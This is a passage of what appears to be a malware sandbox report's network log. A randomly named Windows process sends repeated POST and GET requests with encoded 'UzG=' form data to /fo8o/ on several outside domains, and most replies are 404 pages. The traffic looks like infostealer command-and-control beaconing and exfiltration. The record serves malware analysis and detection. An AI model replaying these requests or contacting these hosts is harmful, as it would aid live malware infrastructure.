                                                                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                15192.168.2.54999366.29.149.46803440C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 24, 2024 08:26:07.316011906 CET1818OUTPOST /fo8o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.techchains.info
                                                                                Origin: http://www.techchains.info
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 1240
                                                                                Referer: http://www.techchains.info/fo8o/
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                Data Raw: 55 7a 47 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 63 57 44 32 67 46 78 31 5a 31 7a 56 4d 79 39 68 4d 2f 32 39 50 59 42 6b 57 65 67 36 34 30 57 38 32 68 53 35 62 52 2b 37 33 2f 70 31 59 78 46 53 30 52 52 4a 71 57 32 41 7a 76 70 6a 47 62 49 38 31 4c 70 36 56 6b 71 62 39 50 7a 33 70 72 75 61 75 50 52 51 6d 44 34 44 49 71 68 2b 41 4e 67 61 38 6b 31 58 38 6b 79 50 74 4d 6d 67 59 70 30 4f 63 45 34 33 4a 57 57 37 4e 71 4c 65 49 6f 76 41 4a 52 66 63 6e 2f 44 2b 4a 63 52 51 61 42 5a 72 68 6b 73 75 44 75 5a 71 6c 45 73 48 4a 2f 58 37 38 67 57 6f [TRUNCATED]
                                                                                Data Ascii: UzG=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNncWD2gFx1Z1zVMy9hM/29PYBkWeg640W82hS5bR+73/p1YxFS0RRJqW2AzvpjGbI81Lp6Vkqb9Pz3pruauPRQmD4DIqh+ANga8k1X8kyPtMmgYp0OcE43JWW7NqLeIovAJRfcn/D+JcRQaBZrhksuDuZqlEsHJ/X78gWoLuPOUIMSi8BLb47JHp5nQZNcZXj6xRy4dk7daE4QycCvUUzUe6EDlGixQLo2JyxdCCjB99BrvpqTvXwoZrEGGveh1YUvD1M9uwhS2Djxkp2e8N11pcLjj3V7fQpSR0PSbup4sS5SNgcqy1OyN6NQpjD2Gsu3STmTn34rqvP3gyE99T1zbRN89ecSSpiwgrnQGzxJxojkTHtDvbDPc2mGlo/980AbVDdw2V4nCfsT9slapAKaq7EEGSeL5i5bH26IQFj/h5ste+eT38btOkmrSX2Uhvlx7+D+TUFcb0rOFOgx6pWk/tKyNXB3rpiYyOR3CiXEqvkhsCKuR2XyVnr3LLe3yV8xHwOTAsZlk9Nr/Hv2Em+zLzYgGBbMENFa0u3f1ylUJeHH8+xGvGM590iI5Uth1I3mxhoJAWDEtppY9LEAiRV+61TFKzUpnM/NRdGOhW5gQEEIRQerBC2R6JTJSEhRMdJ2qTrSzwMCv6VK/n9JXBnu0IG5JtM4G4aYE6Gxt6X1aPY/iCWvNrPXZ4pqgS5iXxHEzdRdodsc9HffbWjYC+3vYu6i5JjkxnT4vfwdN4eDxFbB6sazM4ctju758/LnwlpcqPUKQL9J0uN1KUOJXUXxOtQEXmVLwJAtDjqkYSHfXcx//o/Hx0FG1qN10o4BtUTVzxSFsW [TRUNCATED]
                                                                                Dec 24, 2024 08:26:08.609363079 CET637INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 24 Dec 2024 07:26:08 GMT
                                                                                Server: Apache
                                                                                Content-Length: 493
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                16192.168.2.54999466.29.149.46803440C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 24, 2024 08:26:09.974004984 CET515OUTGET /fo8o/?UzG=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hboQSxRfFXXJhWlOcLO2B4JSrf1qenLAzZaPHfWrFdh0bEA==&SFst=D27DuB HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en
                                                                                Host: www.techchains.info
                                                                                Connection: close
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                Dec 24, 2024 08:26:11.200171947 CET652INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 24 Dec 2024 07:26:11 GMT
                                                                                Server: Apache
                                                                                Content-Length: 493
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                17192.168.2.549995195.110.124.133803440C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 24, 2024 08:26:17.053678989 CET799OUTPOST /fo8o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.elettrosistemista.zip
                                                                                Origin: http://www.elettrosistemista.zip
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 204
                                                                                Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                Data Raw: 55 7a 47 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 69 53 30 5a 7a 49 56 54 58 76 4b 5a 37 6d 56 63 63 63 59 53 44 52 4c 2b 39 4a 4d 44 5a 2f 48 79 67 4b 62 4b 62 65 45 3d
                                                                                Data Ascii: UzG=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCiS0ZzIVTXvKZ7mVcccYSDRL+9JMDZ/HygKbKbeE=
                                                                                Dec 24, 2024 08:26:18.365266085 CET367INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 24 Dec 2024 07:26:18 GMT
                                                                                Server: Apache
                                                                                Content-Length: 203
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                18192.168.2.549996195.110.124.133803440C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 24, 2024 08:26:19.707659006 CET819OUTPOST /fo8o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.elettrosistemista.zip
                                                                                Origin: http://www.elettrosistemista.zip
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 224
                                                                                Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                Data Raw: 55 7a 47 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 6e 47 74 61 45 30 49 50 6d 62 36 70 4c 36 46 4a 51 39 6c 62 6e 74 6f 38 6a 36 61 62 54 45 79 6f 71 74 6e 42 52 77
                                                                                Data Ascii: UzG=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6QxnGtaE0IPmb6pL6FJQ9lbnto8j6abTEyoqtnBRw
                                                                                Dec 24, 2024 08:26:21.013710022 CET367INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 24 Dec 2024 07:26:20 GMT
                                                                                Server: Apache
                                                                                Content-Length: 203
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                19192.168.2.549997195.110.124.133803440C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 24, 2024 08:26:22.363699913 CET1836OUTPOST /fo8o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.elettrosistemista.zip
                                                                                Origin: http://www.elettrosistemista.zip
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 1240
                                                                                Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                Data Raw: 55 7a 47 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 32 5a 30 33 46 74 57 4e 51 6d 4a 43 66 2f 72 36 30 52 65 49 71 72 39 59 76 57 4b 61 34 34 35 6f 6a 44 76 49 4c 39 54 6f 4b 68 7a 2b 48 2b 32 33 5a 35 5a 30 51 37 30 74 4e 47 45 30 61 73 4e 45 43 76 6f 50 68 41 71 41 5a 71 35 46 73 4f 52 6c 72 65 5a 61 4b 48 65 6f 2b 45 41 7a 2b 42 2f 77 36 52 30 4e 43 35 38 4b 33 65 51 48 39 45 4f 32 53 7a 58 78 48 55 52 70 76 65 43 75 66 49 7a 70 43 78 67 70 7a 77 38 69 31 6d 6b 52 56 59 69 74 6d 32 67 6f 5a 2b 2f 69 78 6a 34 37 72 76 6a 66 45 46 70 75 [TRUNCATED]
                                                                                Data Ascii: UzG=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIM2Z03FtWNQmJCf/r60ReIqr9YvWKa445ojDvIL9ToKhz+H+23Z5Z0Q70tNGE0asNECvoPhAqAZq5FsORlreZaKHeo+EAz+B/w6R0NC58K3eQH9EO2SzXxHURpveCufIzpCxgpzw8i1mkRVYitm2goZ+/ixj47rvjfEFpuvNwsVGrC9Ifw2YrdCRtt6C8W3LYNMRo5bYRsp5nM/eqiKZoxDflpLJCB1lRodrNt9wL04Nd7adMKOJWb586q0++bqb0hnKbeHTSSOaeXEfwuVRmO72bsYEpgRn4m0ARNwjYtA65YOS7JXA8qQ4K9J+v++n+MLZPtINn7STocl2A3Ct0TVuxuY+wgnsJMFRG6tA1RxuVLLvV1AnZhNx1HNnssc7WE/yLrcWMbUzBHXPc1kNCaBFFnx1U97uOS5kDZbbXMP2pDR6ux3gwd0AagBpgRl442rnmHx75cXU3eHxJswxungZDTNQUv505kKZxzw80dtlHOLk/pB/gRWWcZyZbk4ZdNQgs0BmrEzW8TVxt2k82jaSmoGnYjN9XoLQoV1V3MLEI+nuki6gSo2cPk1fxAh9p0o2ralwtZD0t//uTMCXDbrg8fVhD0Ly282XddZXUlAbrcOnA4Vo3SKxFUIZP/22/L8OhkvlybwgHCNEEkxzqhuyeOjkETJOhlPkmzcj/nIXmJCv/eM4YwZqaqLiZRh9WHtxfMi1fKrPdWm4edZPAx0FNzhKyMjvpHto3OeOWNpYDhPl3lVs0qQ1YNP/3AFuKWVkfqkP8N6s1Tl+CTchdpVnnfFygV02iAEx8s/ZD01jKVKesA0Wv8lObFdlA1utCJQSEcps [TRUNCATED]
                                                                                Dec 24, 2024 08:26:23.672518015 CET367INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 24 Dec 2024 07:26:23 GMT
                                                                                Server: Apache
                                                                                Content-Length: 203
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                20192.168.2.549998195.110.124.133803440C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 24, 2024 08:26:25.018898964 CET521OUTGET /fo8o/?SFst=D27DuB&UzG=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ== HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en
                                                                                Host: www.elettrosistemista.zip
                                                                                Connection: close
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                Dec 24, 2024 08:26:26.330123901 CET367INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 24 Dec 2024 07:26:26 GMT
                                                                                Server: Apache
                                                                                Content-Length: 203
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                21192.168.2.549999217.196.55.202803440C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 24, 2024 08:26:48.525791883 CET787OUTPOST /fo8o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.empowermedeco.com
                                                                                Origin: http://www.empowermedeco.com
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 204
                                                                                Referer: http://www.empowermedeco.com/fo8o/
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
